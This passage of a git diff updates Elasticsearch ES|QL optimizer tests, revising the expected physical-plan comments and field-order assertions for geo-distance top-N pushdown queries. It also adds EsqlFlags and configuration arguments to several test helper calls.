estimatedRowSize[245] * */ public void testPushTopNDistanceWithFilterToSource() { @@ -5909,9 +5957,9 @@ public void testPushTopNDistanceWithFilterToSource() { var exchange = asRemoteExchange(topN.child()); project = as(exchange.child(), ProjectExec.class); - assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city", "distance")); + assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name", "distance")); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name")); var evalExec = as(extract.child(), EvalExec.class); var alias = as(evalExec.fields().get(0), Alias.class); assertThat(alias.name(), is("distance")); @@ -5947,48 +5995,25 @@ public void testPushTopNDistanceWithFilterToSource() { /** * - * ProjectExec[[abbrev{f}#14, name{f}#15, location{f}#18, country{f}#19, city{f}#20]] - * \_TopNExec[[Order[distance{r}#4,ASC,LAST]],5[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#14, name{f}#15, location{f}#18, country{f}#19, city{f}#20, distance{r}#4],false] - * \_ProjectExec[[abbrev{f}#14, name{f}#15, location{f}#18, country{f}#19, city{f}#20, distance{r}#4]] - * \_FieldExtractExec[abbrev{f}#14, name{f}#15, country{f}#19, city{f}#20][] - * \_EvalExec[[STDISTANCE(location{f}#18,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) - * AS distance]] - * \_FieldExtractExec[location{f}#18][] - * \_EsQueryExec[airports], indexMode[standard], query[{ - * "bool":{ - * "filter":[ - * { - * "esql_single_value":{ - * "field":"scalerank", - * "next":{"range":{"scalerank":{"lt":6,"boost":1.0}}}, - * "source":"scalerank lt 6@3:31" - * } - * }, - * { - * "bool":{ - * "must":[ - * {"geo_shape":{ - * "location":{ - * "relation":"INTERSECTS", - * "shape":{"type":"Circle","radius":"499999.99999999994m","coordinates":[12.565,55.673]} - * } - * }}, - * {"geo_shape":{ - * "location":{ - * "relation":"DISJOINT", - * "shape":{"type":"Circle","radius":"10000.000000000002m","coordinates":[12.565,55.673]} - * } - * }} - * ], - * "boost":1.0 - * } - * } - * ], - * "boost":1.0 - * }}][_doc{f}#31], limit[5], sort[[ - * GeoDistanceSort[field=location{f}#18, direction=ASC, lat=55.673, lon=12.565] - * ]] estimatedRowSize[245] + * ProjectExec[[abbrev{f}#6367, name{f}#6368, location{f}#6371, country{f}#6372, city{f}#6373]] + * \_TopNExec[[Order[distance{r}#6357,ASC,LAST]],5[INTEGER],229] + * \_ExchangeExec[[abbrev{f}#6367, city{f}#6373, country{f}#6372, location{f}#6371, name{f}#6368, distance{r}#6357],false] + * \_ProjectExec[[abbrev{f}#6367, city{f}#6373, country{f}#6372, location{f}#6371, name{f}#6368, distance{r}#6357]] + * \_FieldExtractExec[abbrev{f}#6367, city{f}#6373, country{f}#6372, name..]<[],[]> + * \_EvalExec[[STDISTANCE(location{f}#6371,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distan + * ce#6357]] + * \_FieldExtractExec[location{f}#6371]<[],[]> + * \_EsQueryExec[airports], indexMode[standard], query[ + * {"bool":{"filter":[{"esql_single_value":{"field":"scalerank","next":{"range": + * {"scalerank":{"lt":6,"boost":0.0}}},"source":"scalerank < 6@3:31"}}, + * {"bool":{"must":[{"geo_shape": + * {"location":{"relation":"INTERSECTS","shape": + * {"type":"Circle","radius":"499999.99999999994m","coordinates":[12.565,55.673]}}}}, + * {"geo_shape":{"location":{"relation":"DISJOINT","shape": + * {"type":"Circle","radius":"10000.000000000002m","coordinates":[12.565,55.673]}}}}] + * ,"boost":1.0}}],"boost":1.0}} + * ][_doc{f}#6384], limit[5], sort[ + * [GeoDistanceSort[field=location{f}#6371, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[245] * */ public void testPushTopNDistanceWithCompoundFilterToSource() { @@ -6006,9 +6031,9 @@ public void testPushTopNDistanceWithCompoundFilterToSource() { var exchange = asRemoteExchange(topN.child()); project = as(exchange.child(), ProjectExec.class); - assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city", "distance")); + assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name", "distance")); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name")); var evalExec = as(extract.child(), EvalExec.class); var alias = as(evalExec.fields().get(0), Alias.class); assertThat(alias.name(), is("distance")); @@ -6046,35 +6071,28 @@ public void testPushTopNDistanceWithCompoundFilterToSource() { /** * Tests that multiple sorts, including distance and a field, are pushed down to the source. * - * ProjectExec[[abbrev{f}#25, name{f}#26, location{f}#29, country{f}#30, city{f}#31, scalerank{f}#27, scale{r}#7]] - * \_TopNExec[[ - * Order[distance{r}#4,ASC,LAST], - * Order[scalerank{f}#27,ASC,LAST], - * Order[scale{r}#7,DESC,FIRST], - * Order[loc{r}#10,DESC,FIRST] - * ],5[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#25, name{f}#26, location{f}#29, country{f}#30, city{f}#31, scalerank{f}#27, scale{r}#7, - * distance{r}#4, loc{r}#10],false] - * \_ProjectExec[[abbrev{f}#25, name{f}#26, location{f}#29, country{f}#30, city{f}#31, scalerank{f}#27, scale{r}#7, - * distance{r}#4, loc{r}#10]] - * \_FieldExtractExec[abbrev{f}#25, name{f}#26, country{f}#30, city{f}#31][] - * \_EvalExec[[ - * STDISTANCE(location{f}#29,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distance, - * 10[INTEGER] - scalerank{f}#27 AS scale, TOSTRING(location{f}#29) AS loc - * ]] - * \_FieldExtractExec[location{f}#29, scalerank{f}#27][] - * \_EsQueryExec[airports], indexMode[standard], query[{ - * "bool":{ - * "filter":[ - * {"esql_single_value":{"field":"scalerank","next":{...},"source":"scalerank < 6@3:31"}}, - * {"bool":{ - * "must":[ - * {"geo_shape":{"location":{"relation":"INTERSECTS","shape":{...}}}}, - * {"geo_shape":{"location":{"relation":"DISJOINT","shape":{...}}}} - * ],"boost":1.0}}],"boost":1.0}}][_doc{f}#44], limit[5], sort[[ - * GeoDistanceSort[field=location{f}#29, direction=ASC, lat=55.673, lon=12.565], - * FieldSort[field=scalerank{f}#27, direction=ASC, nulls=LAST] - * ]] estimatedRowSize[303] + * ProjectExec[[abbrev{f}#7429, name{f}#7430, location{f}#7433, country{f}#7434, city{f}#7435, scalerank{f}#7431, scale{r}#74 + * 11]] + * \_TopNExec[[Order[distance{r}#7408,ASC,LAST], Order[scalerank{f}#7431,ASC,LAST], Order[scale{r}#7411,DESC,FIRST], Order[l + * oc{r}#7414,DESC,FIRST]],5[INTEGER],287] + * \_ExchangeExec[[abbrev{f}#7429, city{f}#7435, country{f}#7434, location{f}#7433, name{f}#7430, scalerank{f}#7431, distance{r} + * #7408, scale{r}#7411, loc{r}#7414],false] + * \_ProjectExec[[abbrev{f}#7429, city{f}#7435, country{f}#7434, location{f}#7433, name{f}#7430, scalerank{f}#7431, distance{r} + * #7408, scale{r}#7411, loc{r}#7414]] + * \_FieldExtractExec[abbrev{f}#7429, city{f}#7435, country{f}#7434, name..]<[],[]> + * \_EvalExec[[STDISTANCE(location{f}#7433,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distan + * ce#7408, 10[INTEGER] - scalerank{f}#7431 AS scale#7411, TOSTRING(location{f}#7433) AS loc#7414]] + * \_FieldExtractExec[location{f}#7433, scalerank{f}#7431]<[],[]> + * \_EsQueryExec[airports], indexMode[standard], query[ + * {"bool":{"filter":[{"esql_single_value":{"field":"scalerank","next": + * {"range":{"scalerank":{"lt":6,"boost":0.0}}},"source":"scalerank < 6@3:31"}}, + * {"bool":{"must":[{"geo_shape":{"location":{"relation":"INTERSECTS","shape": + * {"type":"Circle","radius":"499999.99999999994m","coordinates":[12.565,55.673]}}}}, + * {"geo_shape":{"location":{"relation":"DISJOINT","shape": + * {"type":"Circle","radius":"10000.000000000002m","coordinates":[12.565,55.673]}}}}], + * "boost":1.0}}],"boost":1.0}}][_doc{f}#7448], limit[5], sort[ + * [GeoDistanceSort[field=location{f}#7433, direction=ASC, lat=55.673, lon=12.565], + * FieldSort[field=scalerank{f}#7431, direction=ASC, nulls=LAST]]] estimatedRowSize[303] * */ public void testPushTopNDistanceAndPushableFieldWithCompoundFilterToSource() { @@ -6095,10 +6113,10 @@ public void testPushTopNDistanceAndPushableFieldWithCompoundFilterToSource() { project = as(exchange.child(), ProjectExec.class); assertThat( names(project.projections()), - contains("abbrev", "name", "location", "country", "city", "scalerank", "scale", "distance", "loc") + contains("abbrev", "city", "country", "location", "name", "scalerank", "distance", "scale", "loc") ); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name")); var evalExec = as(extract.child(), EvalExec.class); var alias = as(evalExec.fields().get(0), Alias.class); assertThat(alias.name(), is("distance")); @@ -6140,26 +6158,30 @@ public void testPushTopNDistanceAndPushableFieldWithCompoundFilterToSource() { /** * This test shows that if the filter contains a predicate on the same field that is sorted, we cannot push down the sort. * - * ProjectExec[[abbrev{f}#23, name{f}#24, location{f}#27, country{f}#28, city{f}#29, scalerank{f}#25 AS scale]] - * \_TopNExec[[Order[distance{r}#4,ASC,LAST], Order[scalerank{f}#25,ASC,LAST]],5[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#23, name{f}#24, location{f}#27, country{f}#28, city{f}#29, scalerank{f}#25, distance{r}#4],false] - * \_ProjectExec[[abbrev{f}#23, name{f}#24, location{f}#27, country{f}#28, city{f}#29, scalerank{f}#25, distance{r}#4]] - * \_FieldExtractExec[abbrev{f}#23, name{f}#24, country{f}#28, city{f}#29][] - * \_TopNExec[[Order[distance{r}#4,ASC,LAST], Order[scalerank{f}#25,ASC,LAST]],5[INTEGER],208] - * \_FieldExtractExec[scalerank{f}#25][] - * \_FilterExec[SUBSTRING(position{r}#7,1[INTEGER],5[INTEGER]) == [50 4f 49 4e 54][KEYWORD]] - * \_EvalExec[[ - * STDISTANCE(location{f}#27,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distance, - * TOSTRING(location{f}#27) AS position - * ]] - * \_FieldExtractExec[location{f}#27][] - * \_EsQueryExec[airports], indexMode[standard], query[{ - * "bool":{"filter":[ - * {"esql_single_value":{"field":"scalerank","next":{"range":{"scalerank":{"lt":6,"boost":1.0}}},"source":...}}, - * {"bool":{"must":[ - * {"geo_shape":{"location":{"relation":"INTERSECTS","shape":{...}}}}, - * {"geo_shape":{"location":{"relation":"DISJOINT","shape":{...}}}} - * ],"boost":1.0}}],"boost":1.0}}][_doc{f}#42], limit[], sort[] estimatedRowSize[87] + * ProjectExec[[abbrev{f}#4856, name{f}#4857, location{f}#4860, country{f}#4861, city{f}#4862, scalerank{f}#4858 AS scale#484 + * 3]] + * \_TopNExec[[Order[distance{r}#4837,ASC,LAST], Order[scalerank{f}#4858,ASC,LAST]],5[INTEGER],233] + * \_ExchangeExec[[abbrev{f}#4856, city{f}#4862, country{f}#4861, location{f}#4860, name{f}#4857, scalerank{f}#4858, distance{r} + * #4837],false] + * \_ProjectExec[[abbrev{f}#4856, city{f}#4862, country{f}#4861, location{f}#4860, name{f}#4857, scalerank{f}#4858, distance{r} + * #4837]] + * \_FieldExtractExec[abbrev{f}#4856, city{f}#4862, country{f}#4861, name..]<[],[]> + * \_TopNExec[[Order[distance{r}#4837,ASC,LAST], Order[scalerank{f}#4858,ASC,LAST]],5[INTEGER],303] + * \_FieldExtractExec[scalerank{f}#4858]<[],[]> + * \_FilterExec[SUBSTRING(position{r}#4840,1[INTEGER],5[INTEGER]) == POINT[KEYWORD]] + * \_EvalExec[[STDISTANCE(location{f}#4860,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS + * distance#4837, TOSTRING(location{f}#4860) AS position#4840]] + * \_FieldExtractExec[location{f}#4860]<[],[]> + * \_EsQueryExec[airports], indexMode[standard], query[ + * {"bool":{"filter":[ + * {"esql_single_value": + * {"field":"scalerank","next":{"range":{"scalerank":{"lt":6,"boost":0.0}}},"source":"scale < 6@3:93"}}, + * {"bool":{"must":[ + * {"geo_shape":{"location":{"relation":"INTERSECTS","shape": + * {"type":"Circle","radius":"499999.99999999994m","coordinates":[12.565,55.673]}}}}, + * {"geo_shape":{"location":{"relation":"DISJOINT","shape": + * {"type":"Circle","radius":"10000.000000000002m","coordinates":[12.565,55.673]}}}} + * ],"boost":1.0}}],"boost":1.0}}][_doc{f}#4875], limit[], sort[] estimatedRowSize[87] * */ public void testPushTopNDistanceAndNonPushableEvalWithCompoundFilterToSource() { @@ -6178,9 +6200,9 @@ public void testPushTopNDistanceAndNonPushableEvalWithCompoundFilterToSource() { var exchange = asRemoteExchange(topN.child()); project = as(exchange.child(), ProjectExec.class); - assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city", "scalerank", "distance")); + assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name", "scalerank", "distance")); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name")); var topNChild = as(extract.child(), TopNExec.class); extract = as(topNChild.child(), FieldExtractExec.class); assertThat(names(extract.attributesToExtract()), contains("scalerank")); @@ -6215,27 +6237,25 @@ public void testPushTopNDistanceAndNonPushableEvalWithCompoundFilterToSource() { /** * This test shows that if the filter contains a predicate on the same field that is sorted, we cannot push down the sort. * - * ProjectExec[[abbrev{f}#23, name{f}#24, location{f}#27, country{f}#28, city{f}#29, scale{r}#10]] - * \_TopNExec[[Order[distance{r}#4,ASC,LAST], Order[scale{r}#10,ASC,LAST]],5[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#23, name{f}#24, location{f}#27, country{f}#28, city{f}#29, scale{r}#10, distance{r}#4],false] - * \_ProjectExec[[abbrev{f}#23, name{f}#24, location{f}#27, country{f}#28, city{f}#29, scale{r}#10, distance{r}#4]] - * \_FieldExtractExec[abbrev{f}#23, name{f}#24, country{f}#28, city{f}#29][] - * \_TopNExec[[Order[distance{r}#4,ASC,LAST], Order[scale{r}#10,ASC,LAST]],5[INTEGER],208] - * \_FilterExec[ - * SUBSTRING(position{r}#7,1[INTEGER],5[INTEGER]) == [50 4f 49 4e 54][KEYWORD] - * AND scale{r}#10 > 3[INTEGER] - * ] - * \_EvalExec[[ - * STDISTANCE(location{f}#27,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distance, - * TOSTRING(location{f}#27) AS position, - * 10[INTEGER] - scalerank{f}#25 AS scale - * ]] - * \_FieldExtractExec[location{f}#27, scalerank{f}#25][] - * \_EsQueryExec[airports], indexMode[standard], query[{ - * "bool":{"must":[ - * {"geo_shape":{"location":{"relation":"INTERSECTS","shape":{...}}}}, - * {"geo_shape":{"location":{"relation":"DISJOINT","shape":{...}}}} - * ],"boost":1.0}}][_doc{f}#42], limit[], sort[] estimatedRowSize[91] + *ProjectExec[[abbrev{f}#1447, name{f}#1448, location{f}#1451, country{f}#1452, city{f}#1453, scalerank{r}#1434]] + * \_TopNExec[[Order[distance{r}#1428,ASC,LAST], Order[scalerank{r}#1434,ASC,LAST]],5[INTEGER],233] + * \_ExchangeExec[[abbrev{f}#1447, city{f}#1453, country{f}#1452, location{f}#1451, name{f}#1448, distance{r}#1428, scalerank{r} + * #1434],false] + * \_ProjectExec[[abbrev{f}#1447, city{f}#1453, country{f}#1452, location{f}#1451, name{f}#1448, distance{r}#1428, scalerank{r} + * #1434]] + * \_FieldExtractExec[abbrev{f}#1447, city{f}#1453, country{f}#1452, name..]<[],[]> + * \_TopNExec[[Order[distance{r}#1428,ASC,LAST], Order[scalerank{r}#1434,ASC,LAST]],5[INTEGER],303] + * \_FilterExec[SUBSTRING(position{r}#1431,1[INTEGER],5[INTEGER]) == POINT[KEYWORD] AND scalerank{r}#1434 > 3[INTEGER]] + * \_EvalExec[[STDISTANCE(location{f}#1451,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distan + * ce#1428, TOSTRING(location{f}#1451) AS position#1431, 10[INTEGER] - scalerank{f}#1449 AS scalerank#1434]] + * \_FieldExtractExec[location{f}#1451, scalerank{f}#1449]<[],[]> + * \_EsQueryExec[airports], indexMode[standard], query[ + * {"bool":{"must":[ + * {"geo_shape":{"location":{"relation":"INTERSECTS","shape": + * {"type":"Circle","radius":"499999.99999999994m","coordinates":[12.565,55.673]}}}}, + * {"geo_shape":{"location":{"relation":"DISJOINT","shape": + * {"type":"Circle","radius":"10000.000000000002m","coordinates":[12.565,55.673]}}}} + * ],"boost":1.0}}][_doc{f}#1466], limit[], sort[] estimatedRowSize[91] * */ public void testPushTopNDistanceAndNonPushableEvalsWithCompoundFilterToSource() { @@ -6254,9 +6274,9 @@ public void testPushTopNDistanceAndNonPushableEvalsWithCompoundFilterToSource() var exchange = asRemoteExchange(topN.child()); project = as(exchange.child(), ProjectExec.class); - assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city", "scalerank", "distance")); + assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name", "distance", "scalerank")); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name")); var topNChild = as(extract.child(), TopNExec.class); var filter = as(topNChild.child(), FilterExec.class); assertThat(filter.condition(), isA(And.class)); @@ -6331,9 +6351,9 @@ public void testPushTopNDistanceWithCompoundFilterToSourceAndDisjunctiveNonPusha var exchange = asRemoteExchange(topN.child()); project = as(exchange.child(), ProjectExec.class); - assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city", "scalerank", "distance")); + assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name", "scalerank", "distance")); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name")); var topNChild = as(extract.child(), TopNExec.class); var filter = as(topNChild.child(), FilterExec.class); assertThat(filter.condition(), isA(Or.class)); @@ -6360,28 +6380,29 @@ public void testPushTopNDistanceWithCompoundFilterToSourceAndDisjunctiveNonPusha /** * - * ProjectExec[[abbrev{f}#15, name{f}#16, location{f}#19, country{f}#20, city{f}#21]] - * \_TopNExec[[Order[scalerank{f}#17,ASC,LAST], Order[distance{r}#4,ASC,LAST]],15[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#15, name{f}#16, location{f}#19, country{f}#20, city{f}#21, scalerank{f}#17, distance{r}#4],false] - * \_ProjectExec[[abbrev{f}#15, name{f}#16, location{f}#19, country{f}#20, city{f}#21, scalerank{f}#17, distance{r}#4]] - * \_FieldExtractExec[abbrev{f}#15, name{f}#16, country{f}#20, city{f}#21, ..][] - * \_EvalExec[[STDISTANCE(location{f}#19,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) - * AS distance]] - * \_FieldExtractExec[location{f}#19][] - * \_EsQueryExec[airports], indexMode[standard], query[{ - * "bool":{ - * "filter":[ - * {"esql_single_value":{"field":"scalerank",...,"source":"scalerank lt 6@3:31"}}, - * {"bool":{"must":[ - * {"geo_shape":{"location":{"relation":"INTERSECTS","shape":{...}}}}, - * {"geo_shape":{"location":{"relation":"DISJOINT","shape":{...}}}} - * ],"boost":1.0}} - * ],"boost":1.0 - * } - * }][_doc{f}#32], limit[], sort[[ - * FieldSort[field=scalerank{f}#17, direction=ASC, nulls=LAST], - * GeoDistanceSort[field=location{f}#19, direction=ASC, lat=55.673, lon=12.565] - * ]] estimatedRowSize[37] + * ProjectExec[[abbrev{f}#6090, name{f}#6091, location{f}#6094, country{f}#6095, city{f}#6096]] + * \_TopNExec[[Order[scalerank{f}#6092,ASC,LAST], Order[distance{r}#6079,ASC,LAST]],15[INTEGER],233] + * \_ExchangeExec[[abbrev{f}#6090, city{f}#6096, country{f}#6095, location{f}#6094, name{f}#6091, scalerank{f}#6092, distance{r} + * #6079],false] + * \_ProjectExec[[abbrev{f}#6090, city{f}#6096, country{f}#6095, location{f}#6094, name{f}#6091, scalerank{f}#6092, distance{r} + * #6079]] + * \_FieldExtractExec[abbrev{f}#6090, city{f}#6096, country{f}#6095, name..]<[],[]> + * \_EvalExec[[STDISTANCE(location{f}#6094,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distan + * ce#6079]] + * \_FieldExtractExec[location{f}#6094]<[],[]> + * \_EsQueryExec[airports], indexMode[standard], query[ + * {"bool":{"filter":[ + * {"esql_single_value":{"field":"scalerank","next":{"range": + * {"scalerank":{"lt":6,"boost":0.0}}},"source":"scalerank < 6@3:31"}}, + * {"bool":{"must":[ + * {"geo_shape": {"location":{"relation":"INTERSECTS","shape": + * {"type":"Circle","radius":"499999.99999999994m","coordinates":[12.565,55.673]}}}}, + * {"geo_shape":{"location":{"relation":"DISJOINT","shape": + * {"type":"Circle","radius":"10000.000000000002m","coordinates":[12.565,55.673]}}}} + * ],"boost":1.0}}],"boost":1.0}} + * ][_doc{f}#6107], limit[15], sort[ + * [FieldSort[field=scalerank{f}#6092, direction=ASC, nulls=LAST], + * GeoDistanceSort[field=location{f}#6094, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[249] * */ public void testPushCompoundTopNDistanceWithCompoundFilterToSource() { @@ -6400,9 +6421,9 @@ public void testPushCompoundTopNDistanceWithCompoundFilterToSource() { var exchange = asRemoteExchange(topN.child()); project = as(exchange.child(), ProjectExec.class); - assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city", "scalerank", "distance")); + assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name", "scalerank", "distance")); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city", "scalerank")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name", "scalerank")); var evalExec = as(extract.child(), EvalExec.class); var alias = as(evalExec.fields().get(0), Alias.class); assertThat(alias.name(), is("distance")); @@ -7842,7 +7863,7 @@ private LocalExecutionPlanner.LocalExecutionPlan physicalOperationsFromPhysicalP // The TopN needs an estimated row size for the planner to work var plans = PlannerUtils.breakPlanBetweenCoordinatorAndDataNode(EstimatesRowSize.estimateRowSize(0, plan), config); plan = useDataNodePlan ? plans.v2() : plans.v1(); - plan = PlannerUtils.localPlan(config, FoldContext.small(), plan, TEST_SEARCH_STATS); + plan = PlannerUtils.localPlan(new EsqlFlags(true), config, FoldContext.small(), plan, TEST_SEARCH_STATS); ExchangeSinkHandler exchangeSinkHandler = new ExchangeSinkHandler(null, 10, () -> 10); LocalExecutionPlanner planner = new LocalExecutionPlanner( "test", @@ -7857,7 +7878,12 @@ private LocalExecutionPlanner.LocalExecutionPlan physicalOperationsFromPhysicalP null, null, null, - new EsPhysicalOperationProviders(FoldContext.small(), List.of(), null, DataPartitioning.AUTO), + new EsPhysicalOperationProviders( + FoldContext.small(), + List.of(), + null, + new PhysicalSettings(DataPartitioning.AUTO, ByteSizeValue.ofMb(1)) + ), List.of() ); @@ -8040,7 +8066,7 @@ public void testNotEqualsPushdownToDelegate() { * ges{f}#5, last_name{f}#6, long_noidx{f}#12, salary{f}#7],false] * \_ProjectExec[[_meta_field{f}#8, emp_no{f}#2, first_name{f}#3, gender{f}#4, hire_date{f}#9, job{f}#10, job.raw{f}#11, langua * ges{f}#5, last_name{f}#6, long_noidx{f}#12, salary{f}#7]] - * \_FieldExtractExec[_meta_field{f}#8, emp_no{f}#2, first_name{f}#3, gen..]<[],[]> + * \_FieldExtractExec[_meta_field{f}#8, emp_no{f}#2, first_name{f}#3, gen..]<[],[]> * \_EsQueryExec[test], indexMode[standard], * query[{"bool":{"filter":[{"sampling":{"probability":0.1,"seed":234,"hash":0}}],"boost":1.0}}] * [_doc{f}#24], limit[1000], sort[] estimatedRowSize[332] @@ -8209,7 +8235,7 @@ private PhysicalPlan optimizedPlan(PhysicalPlan plan, SearchStats searchStats) { // individually hence why here the plan is kept as is var l = p.transformUp(FragmentExec.class, fragment -> { - var localPlan = PlannerUtils.localPlan(config, FoldContext.small(), fragment, searchStats); + var localPlan = PlannerUtils.localPlan(new EsqlFlags(true), config, FoldContext.small(), fragment, searchStats); return EstimatesRowSize.estimateRowSize(fragment.estimatedRowSize(), localPlan); }); @@ -8247,7 +8273,7 @@ private PhysicalPlan physicalPlan(String query, TestDataSource dataSource) { } private PhysicalPlan physicalPlan(String query, TestDataSource dataSource, boolean assertSerialization) { - var logical = logicalOptimizer.optimize(dataSource.analyzer.analyze(parser.createStatement(query))); + var logical = logicalOptimizer.optimize(dataSource.analyzer.analyze(parser.createStatement(query, config))); // System.out.println("Logical\n" + logical); var physical = mapper.map(logical); // System.out.println("Physical\n" + physical); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/TestPlannerOptimizer.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/TestPlannerOptimizer.java index e6a7d110f8c09..761902bebe19e 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/TestPlannerOptimizer.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/TestPlannerOptimizer.java @@ -15,6 +15,7 @@ import org.elasticsearch.xpack.esql.plan.physical.PhysicalPlan; import org.elasticsearch.xpack.esql.planner.PlannerUtils; import org.elasticsearch.xpack.esql.planner.mapper.Mapper; +import org.elasticsearch.xpack.esql.plugin.EsqlFlags; import org.elasticsearch.xpack.esql.session.Configuration; import org.elasticsearch.xpack.esql.stats.SearchStats; @@ -66,7 +67,7 @@ private PhysicalPlan optimizedPlan(PhysicalPlan plan, SearchStats searchStats) { new LocalLogicalOptimizerContext(config, FoldContext.small(), searchStats) ); var physicalTestOptimizer = new TestLocalPhysicalPlanOptimizer( - new LocalPhysicalOptimizerContext(config, FoldContext.small(), searchStats), + new LocalPhysicalOptimizerContext(new EsqlFlags(true), config, FoldContext.small(), searchStats), true ); var l = PlannerUtils.localPlan(physicalPlan, logicalTestOptimizer, physicalTestOptimizer); @@ -79,7 +80,7 @@ private PhysicalPlan optimizedPlan(PhysicalPlan plan, SearchStats searchStats) { } private PhysicalPlan physicalPlan(String query, Analyzer analyzer) { - var logical = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement(query))); + var logical = logicalOptimizer.optimize(analyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); // System.out.println("Logical\n" + logical); var physical = mapper.map(logical); return physical; diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/logical/PropagateInlineEvalsTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/logical/PropagateInlineEvalsTests.java index 088b5c1c9205e..a7451ea2f5109 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/logical/PropagateInlineEvalsTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/logical/PropagateInlineEvalsTests.java @@ -169,7 +169,7 @@ public void testGroupingAliasingMoved_To_LeftSideOfJoin_WithExpression() { } private LogicalPlan plan(String query, LogicalPlanOptimizer optimizer) { - return optimizer.optimize(analyzer.analyze(parser.createStatement(query))); + return optimizer.optimize(analyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); } @Override diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSourceTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSourceTests.java index cacf6e422882b..00f8dfb9aaacc 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSourceTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/rules/physical/local/PushTopNToSourceTests.java @@ -35,6 +35,7 @@ import org.elasticsearch.xpack.esql.plan.physical.EvalExec; import org.elasticsearch.xpack.esql.plan.physical.PhysicalPlan; import org.elasticsearch.xpack.esql.plan.physical.TopNExec; +import org.elasticsearch.xpack.esql.plugin.EsqlFlags; import org.elasticsearch.xpack.esql.stats.SearchStats; import java.io.IOException; @@ -416,7 +417,7 @@ private static void assertNoPushdownSort(TestPhysicalPlanBuilder builder, String private static PhysicalPlan pushTopNToSource(TopNExec topNExec) { var configuration = EsqlTestUtils.configuration("from test"); - var ctx = new LocalPhysicalOptimizerContext(configuration, FoldContext.small(), SearchStats.EMPTY); + var ctx = new LocalPhysicalOptimizerContext(new EsqlFlags(true), configuration, FoldContext.small(), SearchStats.EMPTY); var pushTopNToSource = new PushTopNToSource(); return pushTopNToSource.rule(topNExec, ctx); } diff --git 